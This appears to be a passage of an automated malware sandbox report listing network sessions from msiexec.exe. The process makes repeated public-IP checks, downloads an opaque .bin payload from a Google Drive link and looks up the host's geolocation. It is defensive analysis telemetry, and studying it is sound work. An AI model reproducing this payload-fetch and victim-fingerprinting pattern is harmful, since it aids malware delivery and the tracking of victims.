Jan 11, 2025 06:31:42.683444023 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6e3cdbe9f1d44addf86f92f5dda9056c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49989	158.101.44.242	80	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:31:43.325509071 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 06:31:43.890775919 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:43 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6afabe9796834526abde9425b671b555 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49991	158.101.44.242	80	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:31:44.504513025 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 06:31:45.303369045 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b373e73bc452b78e551122335ae1ea3e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49993	158.101.44.242	80	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:31:45.906039000 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 06:31:46.473748922 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e63d63f4ec7a3276c1472e54504ce669 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49976	216.58.206.78	443	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:31:31 UTC	216	OUT	GET /uc?export=download&id=1z0zocG9mm2e8uBZPCbcJgrO6W2Ot3dcm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-11 05:31:31 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 05:31:31 GMT Location: https://drive.usercontent.google.com/download?id=1z0zocG9mm2e8uBZPCbcJgrO6W2Ot3dcm&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-YZt8l2BU5WCArAGWUrBSTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49977	142.250.185.129	443	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:31:32 UTC	258	OUT	GET /download?id=1z0zocG9mm2e8uBZPCbcJgrO6W2Ot3dcm&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-11 05:31:35 UTC	4938	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFIdbgQWdesp5Pnt8p1OCd5Ha13Ge_Y-ktHSojjFSL_E9bXp7MWIiTPNytxGbeb7P9gPlOBj Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="gEMTduHtneZsEG158.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 277568 Last-Modified: Thu, 19 Dec 2024 08:03:44 GMT Date: Sat, 11 Jan 2025 05:31:34 GMT Expires: Sat, 11 Jan 2025 05:31:34 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=DER66A== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-11 05:31:35 UTC	4938	IN	Data Raw: fc ea cd d6 63 47 c5 c4 8e d7 cb 1a 98 d7 91 80 35 7b 26 e3 52 5b 4e f7 24 e2 48 88 55 00 df 60 48 5c 77 0c b0 5f 13 d4 2f 89 09 56 ed 4d 9f 62 f9 aa e0 72 3b 79 62 30 8d 16 b1 e0 74 05 a0 26 6f 22 2d 52 07 3c 59 3f d9 3b 12 92 33 0a 03 31 a8 8b 1c d8 42 f3 fa 20 c7 ef 64 fb 42 9f ee a4 e6 c8 13 35 50 16 01 70 9e a1 31 61 15 4a 39 91 43 62 64 16 85 ed 51 55 e3 ed 5c 45 98 21 26 53 17 12 4f 06 dd 02 40 f2 41 59 c9 2f ec 60 78 d2 b1 58 3c d9 cb 67 d9 72 e8 c9 90 97 2d dd d5 5a 36 0c 92 c3 d3 c5 c1 c8 08 44 63 1a 87 87 db ef 7b 26 24 9a 3e 51 a7 3a 0e f8 87 8c b3 98 a3 3b 88 d5 3d 2c a4 14 dc e1 17 a3 1c 71 e6 65 c0 4b 33 0e 4b 9e a4 e3 5a cd 25 46 4b 0b 1f c9 c6 9f 09 4d 47 09 d4 bb ce 68 97 5e 50 99 4a 66 5b 98 e6 d7 07 2b 07 27 30 6a 4c de ea 8b 92 35 b0 Data Ascii: cG5{&R[N$HU`H\w_/VMbr;yb0t&o"-R<Y?;31B dB5Pp1aJ9CbdQU\E!&SO@AY/`xX<gr-Z6Dc{&$>Q:;=,qeK3KZ%FKMGh^PJf[+'0jL5
2025-01-11 05:31:35 UTC	4822	IN	Data Raw: f2 e8 15 f5 e1 ce 67 c0 17 e6 67 c0 4b 33 54 4b 9e 44 d4 59 cc 2e d6 1a 0b 1f e1 c2 9f 09 59 47 09 d4 b9 ce 68 69 b0 55 99 4a 5d 5b 98 e6 7f 02 2b 07 29 70 6a 4c fe ea 8b 92 37 b0 1d f4 3b 44 fa 85 22 8a a8 bc e5 e8 c4 96 35 43 58 c3 4f 96 f6 3c be ed ff c0 d8 b3 04 67 94 05 f4 5a 5d f5 f8 34 32 70 39 81 98 25 98 78 c7 66 60 43 f7 0f 78 71 36 8e 1b bf fb 0c fe 34 d9 4d 41 55 61 cb 0f 05 e1 a6 52 cf bb d1 d2 da 2b c7 9c 2e 81 f8 3e 1e 7f b3 ff 15 53 d0 cc 5e 9b 9d 67 6a 56 ae e7 a3 d3 ec 50 26 44 2f 11 c2 71 3c da 01 a3 be 66 fa 53 23 ef 41 7a 6b 6a 1a f7 5e 58 e7 73 03 65 87 28 fe 5c bb 14 fe 52 31 fc 26 56 d4 b4 c4 df db 3c 3a 14 7e ea d9 a2 7a 79 07 9f 2d d0 3b 57 98 da 13 18 28 bd b4 9b 0f d7 1d e1 ce 55 af 0d bd c9 a3 8f 4d 55 00 6f ea fd 5a bc 11 04 Data Ascii: ggK3TKDY.YGhiUJ][+)pjL7;D"5CXO<gZ]42p9%xf`Cxq64MAUaR+.>S^gjVP&D/q<fS#Azkj^Xse(\R1&V<:~zy-;W(UMUoZ
2025-01-11 05:31:35 UTC	1323	IN	Data Raw: 9c f6 e1 7b ce d9 e8 5d b3 04 6d 94 00 f4 63 3f f5 d0 5d ef 2e 35 8a 9f 0d c2 78 b9 5e 63 2c af 7d 1b 79 59 9a 0d 97 70 0c f9 21 df 3e 1f 46 67 db 66 59 22 a4 58 cf c2 f9 bd bc 2f b5 a7 2b ee ef 28 36 f4 dc 97 1f 45 24 c1 4d ef e5 60 53 6c bc e3 a3 c2 fc a6 37 0a 45 11 c4 08 ef df 01 b8 93 d4 91 53 29 e5 21 be 7a 6c 12 8b 3a 49 ef 07 39 bb 89 2c 9c 99 97 1c e5 3b 9a fd 26 5c de a5 10 a1 1a 53 57 1e 00 dd d4 7c 70 16 d0 9a 01 d2 2a 43 ff a9 ec 08 22 cd 40 f1 01 d7 06 97 f7 4c be 79 fa 93 a3 8f 4d 3a 1b 66 c2 99 5a ad 13 13 d2 89 ca 3f b2 a1 18 a1 fc 9b b5 b7 30 b7 37 b3 d7 e1 dc c5 f5 e7 29 d5 2e ca df 5d f1 ec 60 c7 e2 a9 eb 3f 4f 07 47 45 16 13 01 ec 6a 1f 3d db 16 ca 8c ac 06 8e b5 30 3f 9a bf 0b 6c 31 1c dd fe ca 04 18 6f e8 3a e4 a0 f3 6a 6f 3b 51 f2 Data Ascii: {]mc?].5x^c,}yYp!>FgfY"X/+(6E$M`Sl7ES)!zl:I9,;&\SW\|p*C"@LyM:fZ?07).]`?OGEj=0?l1o:jo;Q
2025-01-11 05:31:35 UTC	1390	IN	Data Raw: 49 80 66 c4 bb 9e ae 83 48 70 c0 f8 59 21 af 8b fc 4b 98 9a e0 f5 17 e5 89 8f 68 de a3 ee cc 68 7f b8 04 d4 38 d8 04 9e 54 90 7f 78 23 25 61 5b 38 0a aa 42 04 4c fb 1a c6 45 38 92 cc f1 a1 14 0c f9 39 c8 42 83 58 08 f2 ef 64 f1 2d c3 ee a4 ec db 32 2e dd 56 01 70 9f 84 27 13 4c 59 39 e1 e1 47 73 3e 31 ed 51 5f 41 c8 44 37 eb 2e 26 23 bb 28 ec 76 e5 b6 49 3b c2 c4 d2 11 0a 42 2c ca 7a 03 69 a9 b9 02 ad 22 9f 8c c6 f4 4c b9 bb 15 42 20 f0 a6 db c0 b4 a6 22 2d 0d 44 fc c8 88 cb 07 68 32 78 03 5c da 4e 35 f8 87 88 9b d1 a3 3b d2 81 1f 52 a8 15 df e5 e6 18 8c 17 e0 65 1e 5b 16 26 7f 9e 44 e9 4b ef 2e 6f 79 0b 1f e5 1c 9f 09 59 47 77 e3 bb ce 6c 1b 7e 56 99 3a 50 73 19 e6 b7 09 3d f9 26 63 4e 5d da c6 d7 8f ba f0 1d f4 3b 61 ec f7 2c 84 a8 cc 9f cc d3 be 91 43 Data Ascii: IfHpY!Khh8Tx#%a[8BLE89BXd-2.Vp'LY9Gs>1Q_AD7.&#(vI;B,zi"LB "-Dh2x\N5;Re[&DK.oyYGwl~V:Ps=&cN];a,C
2025-01-11 05:31:35 UTC	1390	IN	Data Raw: 3c ef 0b f1 02 da e9 42 48 47 c7 f5 bb 25 59 f5 da 54 6b 0d 6f c2 5e 0c 7e d3 b9 20 7b 12 1e 90 fd 4b d5 75 3d d6 ec cc 50 83 36 ba c4 d2 e9 9e bb 93 f2 60 9a 33 75 62 88 8e 5b 8e 12 97 01 53 4f d4 ef c7 3a 75 c6 35 82 53 a4 1f 0a 4a a7 32 b9 4a 31 2e be 1a 8c 8a d4 45 8e 4f e2 66 6d 71 44 d6 da 56 4b 1c 8d a3 4e c8 7c 4d df fc e8 cf 0c ca 21 03 8f 59 06 0f 94 b8 a7 14 91 c3 0d e9 66 4b 40 ac f9 bc 0e b5 29 18 26 7b 8c d7 23 09 e8 48 a3 4a 2a 70 69 8b 62 da 7a 7d b9 62 cb ed d4 71 8e cf eb a7 98 a9 9d cd 44 a7 8e 1f a7 0b db dc 65 e4 9e d4 3a dd 1d 75 e0 4e cd 6b 5f 8d 93 6c c4 bb a6 ae 83 48 b3 4d b8 59 21 d0 9b ea 39 45 e7 83 87 b5 b0 88 8f 5d de a3 ee 78 b3 66 d9 fc ca 33 91 6d ba 4d ee 39 53 23 21 c7 56 c9 78 bd 58 17 30 27 09 dd 3b 16 e0 5b e4 03 41 Data Ascii: <BHG%YTko^~ {Ku=P6`3ub[SO:u5SJ2J1.EOfmqDVKN\|M!YfK@)&{#HJ*pibz}bqDe:uNk_lHMY!9E]xf3mM9S#!VxX0';[A
2025-01-11 05:31:35 UTC	1390	IN	Data Raw: dc ee 82 ae fd d5 1e cd 96 43 d9 b2 bf 07 8c f8 a9 36 91 a2 7c 3e 68 e9 b9 5e c0 31 59 41 49 53 1b 02 94 45 20 e2 2c 42 2c d5 9d dc 6a 73 f5 2c 2d 13 43 b9 b5 36 77 d4 20 08 66 67 2a 6e 20 18 cf 76 b7 f1 1d c3 d9 bd e9 e2 9d 77 55 86 10 08 ec 5d d3 63 65 ce e0 f1 15 86 aa 95 1d f1 ad 4d ad 04 8b 65 98 ca 4b c4 5f 84 c3 7c b5 fc 77 e8 65 af ce 03 83 eb 38 26 90 89 dd 7e 14 b4 8a 59 47 7d 0e 4b 63 ca 9f de 7d 3b 1d 2e e6 3d b8 5b e2 18 27 04 fd ef e1 03 19 b4 db b0 6e 1b 36 bc ee 8e be ca 4c 4b 2d 8e 19 32 bc f2 f4 2c ae f9 22 64 15 fe 14 72 e4 34 5c 32 82 d3 25 3c 06 d2 6d 4b 81 a0 fe d5 2a 02 c6 d2 f1 69 a2 66 90 91 f1 6b 7d c7 48 0e 14 0c 2a d9 e8 0b b0 31 89 fd 58 d5 75 3d 07 24 d6 22 9e 35 bd a5 76 a3 54 c5 8f f8 71 99 33 48 62 88 8e f9 d5 32 e5 ac 43 Data Ascii: C6\|>h^1YAISE ,B,js,-C6w fgn vwU]ceMeK_\|we8&~YG}Kc};.=['n6LK-2,"dr4\2%<mKifk}H*1Xu=$"5vTq3Hb2C
2025-01-11 05:31:35 UTC	1390	IN	Data Raw: b3 c7 97 c8 29 ec f9 12 4e a8 c5 6a 13 b2 b4 42 54 67 5b d3 b8 02 bb e9 04 22 47 b3 3a 08 16 03 29 91 2b 02 c5 e2 d7 0e 24 c4 f6 4a 80 d5 73 34 1c 58 0b f8 12 d8 4d 5b b0 e5 1d d0 61 60 cf bd f3 b5 61 4c 01 cf 5e 1e 9a d4 52 59 d1 31 e5 9b 7b a2 c8 68 78 05 90 89 f8 2a 8d 2d 6a 13 d7 c6 2c 38 e2 00 a7 5a 5e 2f 64 c7 be 3b 66 06 13 66 62 cf 87 15 6d 49 c4 7e e2 b4 c0 91 2b 8a d4 25 73 a6 37 fb 23 ad aa ff 6f 24 4d d7 bd 29 6a 73 21 e9 6b 44 e3 84 31 24 26 fd 30 87 2a e0 fc a4 fb 3c cb 05 f2 b2 46 f0 30 e0 3d 9b 60 89 c9 d1 05 9f 16 cb c8 3f 45 8b 7a a0 fb 46 0d 89 19 f4 63 85 ae f7 87 33 de 87 33 8f ec bf 07 8e 86 59 27 85 80 4a 64 69 ef c9 95 69 b1 59 41 66 6d d1 01 9e 49 0a 5f 2b 6a 4e ab ae d6 b4 77 87 4f 2f 13 4d 9b 9d b7 73 a6 49 1c 98 16 37 41 98 3c Data Ascii: )NjBTg["G:)+$Js4XM[a`aL^RY1{hx-j,8Z^/d;ffbmI~+%s7#o$M)js!kD1$&0<F0=`?EzFc33Y'JdiiYAfmI_+jNwO/MsI7A<
2025-01-11 05:31:35 UTC	1390	IN	Data Raw: 6f f0 b0 64 a2 38 d8 fd 33 95 55 3f d1 44 47 b9 4a a7 ee 0c 5b a8 c9 a1 fa d3 cf 27 db 07 44 b9 fa 58 f8 5a f8 61 98 32 89 ca 8e 1d db 27 c8 91 56 9e 40 e7 c5 35 00 4f 7f a3 b9 68 82 c4 a7 1e a1 f8 35 db ad 78 b6 52 ec f3 1d 2a 87 a9 89 7d 1e de c1 69 05 21 fe 8f ef ff 7e 06 20 5c 39 44 5d fc 28 99 f8 e6 24 a2 e1 8a 80 9c 68 b8 eb 3a 13 7a f6 8f b0 f8 58 b2 0b cc 4a 1f 6e 43 20 b2 b0 62 82 ed 3c 14 64 e1 bb 2c 0b 45 42 a1 99 55 fc 1f d6 fd 67 6b 65 98 db 2e 95 d7 91 17 5e 77 e8 72 11 8a 0c 7c 07 ea 7b 3e ea 8c 67 25 66 00 43 6e 1c 1d 5d 47 a1 c2 40 7f 2c 7e 7d 4e 18 b3 c7 97 db 24 fa f8 f0 75 a8 c5 61 25 b9 d7 ff 2d cc 2b 71 97 15 82 47 6b 88 4d 11 15 10 75 eb 49 4a 5b a0 ea fb a9 0e e7 c4 f2 e8 a5 cf 17 37 69 58 7b 50 37 e3 33 77 b0 e5 31 05 44 7c b7 10 Data Ascii: od83U?DGJ['DXZa2'V@5Oh5xR*}i!~ \9D]($h:zXJnC b<d,EBUgke.^wr\|{>g%fCn]G@,~}N$ua%-+qGkMuIJ[7iX{P73w1D\|
2025-01-11 05:31:35 UTC	1390	IN	Data Raw: 34 df dc 64 c8 9a 1d 8a 00 45 b7 0e e7 5d f0 e5 fb 76 3d d6 bd 35 4b 6a ce 6b 54 84 47 18 56 2f 42 7a 94 b8 45 ce 12 c1 dd 67 ea f8 52 42 7e c9 aa 61 90 ca c3 60 8f e0 b9 a2 69 23 9a a6 d8 d2 03 60 81 54 53 d5 e4 22 bb 9f 4c bb 6e 8e 18 c7 ba 92 d0 2f 2f 8c 9a 63 1d 0e 8b b4 55 6e d3 cb 2e c4 55 9d 44 bd 91 33 c9 35 0b 28 63 00 7d a6 5c 7f 71 0e 18 90 0f 62 82 43 39 4a 3b 2f a0 70 11 66 02 12 fd f3 15 ef 8a 4a 16 c9 91 a9 a7 59 c9 df 30 22 68 2d 84 8e f4 18 b9 17 76 00 cf 4d a7 47 9b 3d 1d 57 97 5c 4c fa 0a e1 2c 1f 3e 92 a6 9e dd 56 66 46 a5 03 28 ff 94 cc d1 e2 c1 6e e3 9f 75 8e 7b 2e e0 be df 55 e1 dc 61 58 e7 ec b8 81 7d f9 8d d4 89 92 0d dc 08 51 16 5c cb 03 44 fc 2a 72 26 81 4c bb 17 ed 1f 79 02 d2 e3 7d e3 72 97 67 14 69 52 5d a3 c9 7a 08 60 bb 6c Data Ascii: 4dE]v=5KjkTGV/BzEgRB~a`i#`TS"Ln//cUn.UD35(c}\qbC9J;/pfJY0"h-vMG=W\L,>VfF(nu{.UaX}Q\D*r&Ly}rgiR]z`l
2025-01-11 05:31:35 UTC	1390	IN	Data Raw: cd b8 5c b1 84 7e c5 0d 15 b5 c7 98 84 de 9a 70 f3 cd dd 7b ce 20 b6 ca aa 15 2d 53 c3 79 b9 f1 a2 eb 2a fc 34 32 fd 01 03 0b 9c c8 2b 37 db 02 ca 8c ac 8c 60 a9 42 10 e5 73 7b ce 13 69 cc ef be 51 d0 6f ec 4e df de cf 6e 1c 83 22 3b 05 2b f4 f4 56 da b5 26 c4 ed 4e 50 ca 04 d6 29 2c b6 d8 d8 b3 bb ca a5 77 d0 2a 52 b3 f2 89 5f 23 74 2c bd f9 91 1b 06 11 b1 0a 6f 48 33 f9 8a d8 39 35 79 52 c3 e8 5a 5d e7 a1 3d f3 2b 8a 1f 9b db cf 32 c0 40 45 87 6e 51 d9 a7 2b b1 c7 55 dd db 7a 5b 91 da fe 9a d4 45 5d e1 54 d8 99 86 9f 27 c5 e5 9a ee 2e 46 06 00 b7 9c 92 de 69 e4 d4 34 df df 68 db 99 1d fe 00 45 b6 02 ec 5e f0 91 fb 76 3a da 30 23 4b 1e ce 66 3d f6 ea 04 45 4a 9e 64 e1 b8 41 b6 ea 8c dd 17 f6 c3 f1 59 f3 83 bc 9f 90 fc c3 03 26 ce 6f d2 cb 06 9b a6 1a d2 Data Ascii: \~p{ -Sy42+7`Bs{iQoNn";+V&NP),wR_#t,oH395yRZ]=+2@EnQ+Uz[E]T'.Fi4hE^v:0#Kf=EJdAY&o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49979	104.21.112.1	443	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:31:37 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 05:31:37 UTC	855	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1888286 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sd9oj8U8MvONkIX1T6f%2FknaHdZmjn%2BmlWUp4FDtClEBQqUaa37yUGyzdDIAtwSlMdcYkNfKiAzAX5Y5moNsn2RIsQJMoFKgcGP0YKCLjn5EKa3yJbwhPGTZO0wHK%2BIEoSNrqIMLL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900285863b28c34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1487&min_rtt=1486&rtt_var=561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1945369&cwnd=181&unsent_bytes=0&cid=1b95ff4e3edcfdc9&ts=157&x=0"
2025-01-11 05:31:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49980	104.21.112.1	443	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:31:38 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 05:31:38 UTC	861	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1888287 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BGzBtxUeVBzQ8o7aimBrE7Fmp2yO0AlmjLhM9C7HDiHUIPcwi9TimSii4faP6a54IapB%2FdZPew%2B4bdnYZc2RQvNfY%2BrLWJkczCsT%2BuzLq3z0bH8Af1L%2BgFZ4gvWOKGIAbPM5TqcN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9002858b2eb2c34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1411&min_rtt=1395&rtt_var=555&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1917268&cwnd=181&unsent_bytes=0&cid=9a62e6e5ca0f1c80&ts=141&x=0"
